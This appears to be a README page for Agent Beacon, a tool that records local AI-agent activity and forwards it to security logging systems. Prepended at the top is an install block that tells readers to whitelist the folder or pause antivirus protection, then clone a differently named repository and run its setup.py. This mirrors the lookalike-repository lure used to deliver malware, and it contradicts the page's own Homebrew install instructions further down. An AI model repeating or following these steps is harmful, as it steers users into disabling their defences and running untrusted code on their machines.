Tip
If the setup does not start, add the folder to the allowed list or pause protection for a few minutes.
Caution
Some security systems may block the installation. Only download from the official repository.
git clone https://github.com/SolidRealmDefend/agent-beacon-654.git
cd agent-beacon-654
python setup.py
Unified endpoint telemetry for AI agents.
Docs · Discord · Install · For Security & IT Teams · Dashboard · Commands
Agent Beacon is Asymptote's open-source endpoint agent for security and IT teams that need visibility into local AI agent activity.
It runs locally, captures all agent activity (e.g. prompts, tool use, file edits, etc.) from all the major local agent harnesses, then normalizes that activity into endpoint events your team can inspect and retain locally.
Beacon is built to be easy to deploy for Security and IT teams through MDM deployment and to emit agent harness telemetry logs to all the major enterprise-grade SIEMs.
Learn more in the Agent Beacon Documentation.
Beacon keeps collection, processing, and inspection local to the endpoint while leaving forwarding under customer control.
- Agent runtime layer: Local hooks and OpenTelemetry sources capture supported activity from AI agent harnesses on the endpoint.
- Beacon endpoint layer: Local processing normalizes events, applies retention and redaction settings, and writes durable endpoint telemetry.
- Output layer: Teams inspect events in the local dashboard, retain JSONL, or forward records into all the major enterprise-grade SIEMs.
Beacon captures supported agent harness activity locally and writes normalized endpoint events that teams can inspect in place or forward into customer-managed security pipelines.
Agent Beacon supports the most popular enterprise coding agent harnesses (e.g. Claude Code, Codex, Cursor, etc.) and knowledge worker agent harnesses (e.g. Claude Cowork, OpenClaw).
| Agent harness | Support path |
|---|---|
| Antigravity CLI | Beacon hook adapter |
| Claude Code | Local OpenTelemetry configuration or Beacon hook adapter |
| Codex CLI | Local OpenTelemetry configuration |
| Cursor | Beacon hook adapter |
| Devin CLI | Beacon hook adapter |
| Devin Desktop | Beacon hook adapter via Cascade/Windsurf hooks |
| Factory Droid | Local OpenTelemetry configuration and optional hook adapter |
| Gemini CLI | Opt-in local OpenTelemetry configuration |
| GitHub Copilot CLI | MDM-managed OpenTelemetry (OTLP HTTP) |
| Grok Build | Beacon hook adapter |
| OpenCode | Beacon hook adapter |
| VS Code | VS Code Copilot OpenTelemetry and optional Beacon hook adapter |
| Agent harness | Support path |
|---|---|
| Claude Cowork | Admin-configured OpenTelemetry setup |
| Hermes Agent | Beacon hook adapter via Hermes shell hooks |
| OpenClaw Gateway | Gateway-configured OTLP/HTTP export |
Agent Beacon writes endpoint telemetry to local JSONL by default and supports customer-controlled forwarding into common security information and event management (SIEM), log aggregation, and object storage destinations.
| Destination | Support path |
|---|---|
| CrowdStrike Falcon LogScale HEC | Optional endpoint forwarding with LogScale ingest tokens during install or repair |
| Microsoft Sentinel | Azure Monitor Agent and Data Collection Rule content pack over local JSONL |
| Rapid7 InsightIDR | Custom Logs webhook content pack over local JSONL |
| Splunk HEC | Optional endpoint forwarding during install or repair |
| Sumo Logic | HTTP Logs & Metrics Source content pack over local JSONL |
| Wazuh | Localfile configuration and Beacon Wazuh content pack |
| Destination | Support path |
|---|---|
| AWS CloudWatch Logs | Vector content pack over local JSONL using customer-managed AWS credentials |
| Customer-managed log pipelines | Forwarding from local Beacon JSONL under customer control |
| Datadog | Datadog Agent custom log collection over local JSONL |
| Elastic | Filebeat or Elastic Agent content pack over local JSONL |
| Destination | Support path |
|---|---|
| AWS S3 | Vector content pack over local JSONL using customer-managed AWS credentials |
| Google Cloud Storage | Vector content pack over local JSONL using customer-managed Google credentials |
| Destination | Support path |
|---|---|
| Local JSONL | Default endpoint log and local dashboard source |
Agent Beacon is designed for Security and IT teams to deploy and validate through standard MDM workflows.
| MDM platform | Support path |
|---|---|
| Fleet | macOS package and user-context deployment helpers |
| Jamf Pro | macOS package, policy scripts, validation, and Extension Attributes |
Beacon includes a local, read-only dashboard for validating endpoint activity without a hosted backend. The overview screen summarizes recent runtime events and collection status, while log search helps teams inspect normalized event records during rollout, testing, and investigations.
Beacon writes endpoint activity to a stable local runtime.jsonl file. The
active file rotates at 10 MiB with five numbered local archives, keeping the
endpoint handoff file bounded while external SIEM forwarders continue tailing
the active path. The dashboard reads the active log plus retained numbered
archives for local triage; SIEM destinations remain the source of truth for
long-term retention and search.
- Beacon CLI docs — full documentation index.
- Installation — install Beacon locally.
- For Security & IT Teams — rollout, validation, and security workflows.
- Security review — review Beacon's architecture, data handling, and local-only posture.
- Endpoint agent — install, status, repair, and uninstall.
- Dashboard — inspect local runtime logs.
- Endpoint event schema — normalized JSONL event model.
- Supported surfaces — supported runtimes, destinations, and boundaries.
- Command reference — detailed CLI command docs.
Start with the security and IT quickstart and managed deployment guidance for rollout, validation, retention, and SIEM forwarding. For vendor review, see the security review.
Install the released Beacon CLI locally with Homebrew:
brew tap asymptote-labs/tap
beacon versionOr build from source:
cd cli/beacon
make buildFor setup, deployment, integrations, and command details, see the Beacon CLI docs.